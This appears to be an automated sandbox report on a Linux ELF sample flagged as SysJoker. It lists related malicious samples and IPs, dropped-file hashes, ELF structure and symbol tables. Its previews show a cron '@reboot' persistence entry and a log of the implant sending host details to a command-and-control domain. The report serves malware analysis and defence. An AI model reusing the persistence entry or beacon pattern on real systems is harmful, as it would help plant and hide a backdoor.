                                                                                                                SecuriteInfo.com.Heur.11449.xlsmGet hashmaliciousBrowse
                                                                                                                • 13.58.205.142
                                                                                                                SecuriteInfo.com.Heur.21286.xlsmGet hashmaliciousBrowse
                                                                                                                • 13.58.205.142
                                                                                                                BANK DETAILS AND INVOICE TO RECONFIRM.exeGet hashmaliciousBrowse
                                                                                                                • 3.130.204.160
                                                                                                                SecuriteInfo.com.Heur.31523.xlsmGet hashmaliciousBrowse
                                                                                                                • 13.58.205.142
                                                                                                                gx86Get hashmaliciousBrowse
                                                                                                                • 13.121.76.6
                                                                                                                garm7Get hashmaliciousBrowse
                                                                                                                • 54.171.230.55
                                                                                                                6E52D162BAF265E070EC1A3147AD651D8BD8481D96B33.exeGet hashmaliciousBrowse
                                                                                                                • 52.218.25.40
                                                                                                                psO5Q4nOUGGet hashmaliciousBrowse
                                                                                                                • 54.171.230.55
                                                                                                                7zip.exeGet hashmaliciousBrowse
                                                                                                                • 3.140.13.188
                                                                                                                SecuriteInfo.com.Heur.18407.xlsmGet hashmaliciousBrowse
                                                                                                                • 13.58.205.142
                                                                                                                SecuriteInfo.com.Heur.7584.xlsmGet hashmaliciousBrowse
                                                                                                                • 13.58.205.142
                                                                                                                wbFIuLI8b7Get hashmaliciousBrowse
                                                                                                                • 34.249.145.219
                                                                                                                Sj3sjFWRJa.msiGet hashmaliciousBrowse
                                                                                                                • 52.67.194.250
                                                                                                                klveP0L6XDGet hashmaliciousBrowse
                                                                                                                • 34.249.145.219
                                                                                                                ZbIfBGPTv5Get hashmaliciousBrowse
                                                                                                                • 54.171.230.55
                                                                                                                uX77qSlk7PGet hashmaliciousBrowse
                                                                                                                • 54.171.230.55

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                /.Library/SystemServices/updateSystemJGJ5oOtOKbGet hashmaliciousBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  /.Library/SystemServices/updateSystem
                                                                                                                  Process:/usr/bin/cp
                                                                                                                  File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=745a4ed6eef433ad63274cc43f1cf5ce84094f4e, not stripped
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):869336
                                                                                                                  Entropy (8bit):6.301392210249311
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:/eUjd10O8iZVdjajDA0KNZmHEWujnQyQ:/erO8iZVdjajDA0KNZmHEWEQX
                                                                                                                  MD5:C805649D6909BF1D7E220F144801044B
                                                                                                                  SHA1:B21BA8DA278B75E1CC515B6E2C84B91BE6611800
                                                                                                                  SHA-256:D028E64BF4EC97DFD655CCD1157A5B96515D461A710231AC8A529D7BDB936FF3
                                                                                                                  SHA-512:139480CF9D8C1D9A6D5F2F67CC3D62CF4008439F1BCB00E8CBFDBF0D9B030CA3BC92D3CA340BB8C272BEC5B64CA38DBF1BBB992147FB605DFDA4CF6F72AFE983
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_SysJoker, Description: Yara detected SysJoker, Source: /.Library/SystemServices/updateSystem, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Virustotal, Detection: 19%, Browse
                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: JGJ5oOtOKb, Detection: malicious, Browse
                                                                                                                  Reputation:low
                                                                                                                  Preview: .ELF..............>.......@.....@........<..........@.8...@.............@.......@.@.....@.@.....................................8.......8.@.....8.@...............................................@.......@.....I.......I......... ..............!.......!h......!h....................... ..............-.......-h......-h.....................................T.......T.@.....T.@.....D.......D...............P.td....`i......`iF.....`iF......C.......C..............Q.td....................................................R.td.....!.......!h......!h..... ....... .............../lib64/ld-linux-x86-64.so.2.............GNU............. ...............GNU.tZN...3.c'L.?....ONa...................b... ...A0.. @...@...H.......GR.)c......H...$"`.......n1.. .PD...J...P..d.UH..A.P.....0.....*.U.......$.B........t!..%_S.'P.................................................................................................................................................................................................
                                                                                                                  /.Library/log.txt
                                                                                                                  Process:/.Library/SystemServices/updateSystem
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1028
                                                                                                                  Entropy (8bit):5.509911616246645
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:xxv2ROSFXt9RQtLZDtyFROVvLREbYGXXt9RQtL9gVQXiEXt9RQtLPxlMmEXt9RQu:jwOSFXl43WROV2b3Xl4qVQXiEXl45lfq
                                                                                                                  MD5:9B04DDDD678BB03D40121ABCADBB6AD6
                                                                                                                  SHA1:1F5B14DFECF49551A6CD137BA9EA7040BF4797AE
                                                                                                                  SHA-256:0B930B7ECFCB6CF831F47ABB37096DCF13B2D3643AA9DD71465AA5EDAD9AC733
                                                                                                                  SHA-512:433793A0E2DEABDB9C8560F3F55C54B9B79C360BCBE19017417C8C273B045C07FBE765BDEAD56AE08F33E4831701081DC77B2B314B8F864C756CC332DF5D846F
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview: start main.currentFullPath.before addToStatup.after addToStatup.befor getUrlAvailable.sendRequest.curl_easy_init.CURLOPT_URL.CURLOPT_FOLLOWLOCATION.curl_easy_perform.NmsjCSAgWSlhaVMvJz0SQH5+aiUzMCUpKFdqOzEgIjYMI2UhCDxmFg==.after getUrlAvailable.https://graphic-updater.com.befor token.serial=root_00:50:56:98:91:2c&name=root&os=Linux 5.4.0-72-generic x86_64&anti=av&ip=local 192.168.2.23&user_token=987217232.sendRequest.curl_easy_init.CURLOPT_URL.CURLOPT_FOLLOWLOCATION.curl_easy_perform.{"token":"fd3d92a9-4080-4c2a-a9e4-387b4d86daaf"}.after token.fd3d92a9-4080-4c2a-a9e4-387b4d86daaf.count .befor sendRequest.sendRequest.curl_easy_init.CURLOPT_URL.CURLOPT_FOLLOWLOCATION.curl_easy_perform.{"data":[]}.after sendRequest.{"data":[]}.count .befor sendRequest.sendRequest.curl_easy_init.CURLOPT_URL.CURLOPT_FOLLOWLOCATION.curl_easy_perform.{"data":[]}.after sendRequest.{"data":[]}.count .befor sendRequest.sendRequest.curl_easy_init.CURLOPT_URL.CURLOPT_FOLLOWLOCATION.curl_easy_perform.{"data":[]}.af
                                                                                                                  /var/spool/cron/crontabs/tmp.Lgobsf
                                                                                                                  Process:/usr/bin/crontab
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):223
                                                                                                                  Entropy (8bit):5.181124938424174
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQ5pVc5ZSGMQ5UYLtCFt3HY+AyBEv:8QjHig8r2keHLUHY+ARv
                                                                                                                  MD5:B6CA5711F1C273764C417136B481F046
                                                                                                                  SHA1:23DEC054B17CF98D96B0C347D23014838635A9FA
                                                                                                                  SHA-256:248944A66955AEF41E84E804B8B09595F630C5EE9B8D329959937C50D07E3875
                                                                                                                  SHA-512:19D58A12EB932DF5B22C61DDC7B5DFDE1730ACC845785FCCE72303332880E4505663FACADF8AFE6286D6EDF252894ABA7B36E6CFC63902EBD8956C343050AF33
                                                                                                                  Malicious:true
                                                                                                                  Reputation:low
                                                                                                                  Preview: # DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Wed Jan 12 09:44:15 2022).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot (/.Library/SystemServices/updateSystem).

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=745a4ed6eef433ad63274cc43f1cf5ce84094f4e, not stripped
                                                                                                                  Entropy (8bit):6.301392210249311
                                                                                                                  TrID:
                                                                                                                  • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                                                  • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                                                  File name:WifCphMYfb
                                                                                                                  File size:869336
                                                                                                                  MD5:c805649d6909bf1d7e220f144801044b
                                                                                                                  SHA1:b21ba8da278b75e1cc515b6e2c84b91be6611800
                                                                                                                  SHA256:d028e64bf4ec97dfd655ccd1157a5b96515d461a710231ac8a529d7bdb936ff3
                                                                                                                  SHA512:139480cf9d8c1d9a6d5f2f67cc3d62cf4008439f1bcb00e8cbfdbf0d9b030ca3bc92d3ca340bb8c272bec5b64ca38dbf1bbb992147fb605dfda4cf6f72afe983
                                                                                                                  SSDEEP:24576:/eUjd10O8iZVdjajDA0KNZmHEWujnQyQ:/erO8iZVdjajDA0KNZmHEWEQX
                                                                                                                  File Content Preview:.ELF..............>.......@.....@........<..........@.8...@.............@.......@.@.....@.@.....................................8.......8.@.....8.@...............................................@.......@.....I.......I......... ..............!.......!h....

                                                                                                                  Static ELF Info

                                                                                                                  ELF header

                                                                                                                  Class:ELF64
                                                                                                                  Data:2's complement, little endian
                                                                                                                  Version:1 (current)
                                                                                                                  Machine:Advanced Micro Devices X86-64
                                                                                                                  Version Number:0x1
                                                                                                                  Type:EXEC (Executable file)
                                                                                                                  OS/ABI:UNIX - Linux
                                                                                                                  ABI Version:0
                                                                                                                  Entry Point Address:0x40840c
                                                                                                                  Flags:0x0
                                                                                                                  ELF Header Size:64
                                                                                                                  Program Header Offset:64
                                                                                                                  Program Header Size:56
                                                                                                                  Number of Program Headers:9
                                                                                                                  Section Header Offset:867352
                                                                                                                  Section Header Size:64
                                                                                                                  Number of Section Headers:31
                                                                                                                  Header String Table Index:30

                                                                                                                  Sections

                                                                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                  NULL0x00x00x00x00x0000
                                                                                                                  .interpPROGBITS0x4002380x2380x1c0x00x2A001
                                                                                                                  .note.ABI-tagNOTE0x4002540x2540x200x00x2A004
                                                                                                                  .note.gnu.build-idNOTE0x4002740x2740x240x00x2A004
                                                                                                                  .gnu.hashGNU_HASH0x4002980x2980x40c0x00x2A508
                                                                                                                  .dynsymDYNSYM0x4006a80x6a80x1b900x180x2A618
                                                                                                                  .dynstrSTRTAB0x4022380x22380x1c360x00x2A001
                                                                                                                  .gnu.versionVERSYM0x403e6e0x3e6e0x24c0x20x2A502
                                                                                                                  .gnu.version_rVERNEED0x4040c00x40c00x1000x00x2A638
                                                                                                                  .rela.dynRELA0x4041c00x41c00x6f00x180x2A508
                                                                                                                  .rela.pltRELA0x4048b00x48b00xcd80x180x42AI5248
                                                                                                                  .initPROGBITS0x4055880x55880x1a0x00x6AX004
                                                                                                                  .pltPROGBITS0x4055b00x55b00x8a00x100x6AX0016
                                                                                                                  .textPROGBITS0x405e500x5e500x58db20x00x6AX0016
                                                                                                                  .finiPROGBITS0x45ec040x5ec040x90x00x6AX004
                                                                                                                  .rodataPROGBITS0x45ec200x5ec200x7d400x00x2A0032
                                                                                                                  .eh_frame_hdrPROGBITS0x4669600x669600x43040x00x2A004
                                                                                                                  .eh_framePROGBITS0x46ac680x6ac680x13a680x00x2A008
                                                                                                                  .gcc_except_tablePROGBITS0x47e6d00x7e6d00x31790x00x2A004
                                                                                                                  .init_arrayINIT_ARRAY0x6821e00x821e00x180x80x3WA008
                                                                                                                  .fini_arrayFINI_ARRAY0x6821f80x821f80x80x80x3WA008
                                                                                                                  .data.rel.roPROGBITS0x6822000x822000xb180x00x3WA0032
                                                                                                                  .dynamicDYNAMIC0x682d180x82d180x2100x100x3WA608
                                                                                                                  .gotPROGBITS0x682f280x82f280xd80x80x3WA008
                                                                                                                  .got.pltPROGBITS0x6830000x830000x4600x80x3WA008
                                                                                                                  .dataPROGBITS0x6834600x834600x300x00x3WA008
                                                                                                                  .bssNOBITS0x6834a00x834900x2d00x00x3WA0032
                                                                                                                  .commentPROGBITS0x00x834900x590x10x30MS001
                                                                                                                  .symtabSYMTAB0x00x834f00x11b500x180x0293568
                                                                                                                  .strtabSTRTAB0x00x950400x3eab60x00x0001
                                                                                                                  .shstrtabSTRTAB0x00xd3af60x1220x00x0001

                                                                                                                  Program Segments

                                                                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                  PHDR0x400x4000400x4000400x1f80x1f81.81360x4R 0x8
                                                                                                                  INTERP0x2380x4002380x4002380x1c0x1c3.94080x4R 0x1/lib64/ld-linux-x86-64.so.2.interp
                                                                                                                  LOAD0x00x4000000x4000000x818490x818493.68750x5R E0x200000.interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame .gcc_except_table
                                                                                                                  LOAD0x821e00x6821e00x6821e00x12b00x15901.69130x6RW 0x200000.init_array .fini_array .data.rel.ro .dynamic .got .got.plt .data .bss
                                                                                                                  DYNAMIC0x82d180x682d180x682d180x2100x2101.24100x6RW 0x8.dynamic
                                                                                                                  NOTE0x2540x4002540x4002540x440x442.71740x4R 0x4.note.ABI-tag .note.gnu.build-id
                                                                                                                  GNU_EH_FRAME0x669600x4669600x4669600x43040x43042.94470x4R 0x4.eh_frame_hdr
                                                                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                                                                                                  GNU_RELRO0x821e00x6821e00x6821e00xe200xe201.38390x4R 0x1.init_array .fini_array .data.rel.ro .dynamic .got

                                                                                                                  Dynamic Tags

                                                                                                                  TypeMetaValueTag
                                                                                                                  DT_NEEDEDsharedliblibcurl.so.40x1
                                                                                                                  DT_NEEDEDsharedliblibstdc++.so.60x1
                                                                                                                  DT_NEEDEDsharedliblibm.so.60x1
                                                                                                                  DT_NEEDEDsharedliblibgcc_s.so.10x1
                                                                                                                  DT_NEEDEDsharedliblibc.so.60x1
                                                                                                                  DT_INITvalue0x4055880xc
                                                                                                                  DT_FINIvalue0x45ec040xd
                                                                                                                  DT_INIT_ARRAYvalue0x6821e00x19
                                                                                                                  DT_INIT_ARRAYSZbytes240x1b
                                                                                                                  DT_FINI_ARRAYvalue0x6821f80x1a
                                                                                                                  DT_FINI_ARRAYSZbytes80x1c
                                                                                                                  DT_GNU_HASHvalue0x4002980x6ffffef5
                                                                                                                  DT_STRTABvalue0x4022380x5
                                                                                                                  DT_SYMTABvalue0x4006a80x6
                                                                                                                  DT_STRSZbytes72220xa
                                                                                                                  DT_SYMENTbytes240xb
                                                                                                                  DT_DEBUGvalue0x00x15
                                                                                                                  DT_PLTGOTvalue0x6830000x3
                                                                                                                  DT_PLTRELSZbytes32880x2
                                                                                                                  DT_PLTRELpltrelDT_RELA0x14
                                                                                                                  DT_JMPRELvalue0x4048b00x17
                                                                                                                  DT_RELAvalue0x4041c00x7
                                                                                                                  DT_RELASZbytes17760x8
                                                                                                                  DT_RELAENTbytes240x9
                                                                                                                  DT_VERNEEDvalue0x4040c00x6ffffffe
                                                                                                                  DT_VERNEEDNUMvalue30x6fffffff
                                                                                                                  DT_VERSYMvalue0x403e6e0x6ffffff0
                                                                                                                  DT_NULLvalue0x00x0

                                                                                                                  Symbols

                                                                                                                  NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                                                                  .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ITM_RU1.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ITM_RU8.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ITM_addUserCommitAction.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ITM_memcpyRnWt.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ITM_memcpyRtWn.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _Unwind_ResumeGCC_3.0libgcc_s.so.1.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZGTtdlPv.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZGTtnam.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNKSs11_M_disjunctEPKc.dynsym0x411b80128FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs13get_allocatorEv.dynsym0x41088041FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs15_M_check_lengthEmmPKc.dynsym0x411b2096FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs16find_last_not_ofEPKcm.dynsym0x40fc5a57FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs16find_last_not_ofEPKcmm.dynsym0x411ed8165FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs3endEv.dynsym0x4116aa77FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs4_Rep12_M_is_leakedEv.dynsym0x411c4a23FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs4_Rep12_M_is_sharedEv.dynsym0x411a1e25FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs4dataEv.dynsym0x40ee5626FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs4sizeEv.dynsym0x40f24829FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs5beginEv.dynsym0x40f26653FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs5c_strEv.dynsym0x40ec4a26FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs5emptyEv.dynsym0x40f39232FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs6_M_repEv.dynsym0x41086230FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs6lengthEv.dynsym0x40ee7029FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs6rbeginEv.dynsym0x40f32052FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs7_M_dataEv.dynsym0x4107fe17FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs7_M_iendEv.dynsym0x411cc277FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs7compareEPKc.dynsym0x412202144FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs7compareERKSs.dynsym0x410328164FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs8_M_checkEmPKc.dynsym0x411dde90FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs8_M_limitEmm.dynsym0x4121b676FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs8capacityEv.dynsym0x41099e30FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs8max_sizeEv.dynsym0x4148c020FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSs9_M_ibeginEv.dynsym0x411c8c53FUNC<unknown>DEFAULT13
                                                                                                                  _ZNKSt12__basic_fileIcE7is_openEvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNKSt13runtime_error4whatEvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSaIcEC1ERKS_GLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSaIcEC1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSaIcEC2ERKS_GLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSaIcEC2EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSaIcED1EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSaIcED2EvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSbIwSt11char_traitsIwESaIwEE12_M_leak_hardEv.dynsym0x43f78081FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSbIwSt11char_traitsIwESaIwEE4_Rep20_S_empty_rep_storageEGLIBCXX_3.4libstdc++.so.6.dynsym0x00OBJECT<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSbIwSt11char_traitsIwESaIwEE4_Rep9_S_createEmmRKS1_.dynsym0x43f4c0150FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSbIwSt11char_traitsIwESaIwEE6appendEmw.dynsym0x43fb10185FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSbIwSt11char_traitsIwESaIwEE6resizeEmw.dynsym0x43fbd069FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSbIwSt11char_traitsIwESaIwEE7reserveEm.dynsym0x43f9e0304FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSbIwSt11char_traitsIwESaIwEE9_M_mutateEmmm.dynsym0x43f560537FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSo5flushEvGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSo5writeEPKclGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSolsEPSt15basic_streambufIcSt11char_traitsIcEEGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSs10_S_compareEmm.dynsym0x412e5a64FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs12_Alloc_hiderC1EPcRKSaIcE.dynsym0x41093453FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs12_Alloc_hiderC2EPcRKSaIcE.dynsym0x41093453FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs12_M_leak_hardEv.dynsym0x414740124FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs12_S_constructIN9__gnu_cxx17__normal_iteratorIPcSsEEEES2_T_S4_RKSaIcESt20forward_iterator_tag.dynsym0x421b4a331FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs12_S_constructIPKcEEPcT_S3_RKSaIcESt20forward_iterator_tag.dynsym0x4193fc305FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs12_S_constructIPcEES0_T_S1_RKSaIcESt20forward_iterator_tag.dynsym0x41cb86305FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs12_S_empty_repEv.dynsym0x4117c411FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs13_S_copy_charsEPcN9__gnu_cxx17__normal_iteratorIS_SsEES2_.dynsym0x4255a077FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs13_S_copy_charsEPcPKcS1_.dynsym0x41ccdf53FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs13_S_copy_charsEPcS_S_.dynsym0x423f1053FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs15_M_replace_safeEmmPKcm.dynsym0x41952e107FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep10_M_destroyERKSaIcE.dynsym0x4134a089FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep10_M_disposeERKSaIcE.dynsym0x4108aa93FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep10_M_refcopyEv.dynsym0x41486c72FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep10_M_refdataEv.dynsym0x4117d018FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep11_S_terminalE.dynsym0x4659dd1OBJECT<unknown>DEFAULT15
                                                                                                                  _ZNSs4_Rep12_S_empty_repEv.dynsym0x41348d18FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep13_M_set_leakedEv.dynsym0x41b33e22FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep15_M_set_sharableEv.dynsym0x411c6222FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep20_S_empty_rep_storageEGLIBCXX_3.4libstdc++.so.6.dynsym0x6834a032OBJECT<unknown>DEFAULT26
                                                                                                                  _ZNSs4_Rep26_M_set_length_and_sharableEm.dynsym0x411a38102FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep7_M_grabERKSaIcES2_.dynsym0x411a9e102FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep8_M_cloneERKSaIcEm.dynsym0x41376c175FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4_Rep9_S_createEmmRKSaIcE.dynsym0x414a38358FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs4swapERSs.dynsym0x40f88e580FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs5clearEv.dynsym0x40f556164FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs5eraseEmm.dynsym0x40fc94105FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6appendEPKc.dynsym0x41096a52FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6appendEPKcm.dynsym0x40f732348FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6appendERKSs.dynsym0x4109fe256FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6appendEmc.dynsym0x41463c259FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6assignEPKc.dynsym0x412e2652FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6assignEPKcm.dynsym0x41848c322FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6assignERKSs.dynsym0x41181e258FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6insertEmPKc.dynsym0x410afe57FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6insertEmPKcm.dynsym0x4135a8451FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6insertEmRKSs.dynsym0x4109bc65FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6insertEmRKSsmm.dynsym0x413528128FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6resizeEm.dynsym0x40f21c43FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs6resizeEmc.dynsym0x4115c6143FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs7_M_copyEPcPKcm.dynsym0x411c0074FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs7_M_dataEPc.dynsym0x4117fe32FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs7_M_leakEv.dynsym0x41167454FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs7_M_moveEPcPKcm.dynsym0x414b9e74FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs7reserveEm.dynsym0x410b38293FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs9_M_assignEPcmc.dynsym0x41b2ef78FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs9_M_mutateEmmm.dynsym0x411f7e567FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSs9push_backEc.dynsym0x411956199FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC1EOSs.dynsym0x40f49a69FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC1EPKcRKSaIcE.dynsym0x40f0fe112FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC1EPKcmRKSaIcEGLIBCXX_3.4libstdc++.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                                                                  _ZNSsC1ERKSs.dynsym0x40f5fa232FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC1ERKSsmm.dynsym0x43b350166FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC1Ev.dynsym0x40f3f683FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC1IN9__gnu_cxx17__normal_iteratorIPcSsEEEET_S4_RKSaIcE.dynsym0x411d1081FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC1IPKcEET_S2_RKSaIcE.dynsym0x41b40681FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC1IPcEET_S1_RKSaIcE.dynsym0x41081081FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC2EOSs.dynsym0x40f49a69FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC2EPKcRKSaIcE.dynsym0x40f0fe112FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC2ERKSs.dynsym0x40f5fa232FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC2ERKSsmm.dynsym0x43b350166FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC2Ev.dynsym0x40f3f683FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC2IN9__gnu_cxx17__normal_iteratorIPcSsEEEET_S4_RKSaIcE.dynsym0x411d1081FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC2IPKcEET_S2_RKSaIcE.dynsym0x41b40681FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsC2IPcEET_S1_RKSaIcE.dynsym0x41081081FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsD1Ev.dynsym0x40edf894FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsD2Ev.dynsym0x40edf894FUNC<unknown>DEFAULT13
                                                                                                                  _ZNSsaSEOSs.dynsym0x40f6e241FUNC<unknown>DEFAULT13
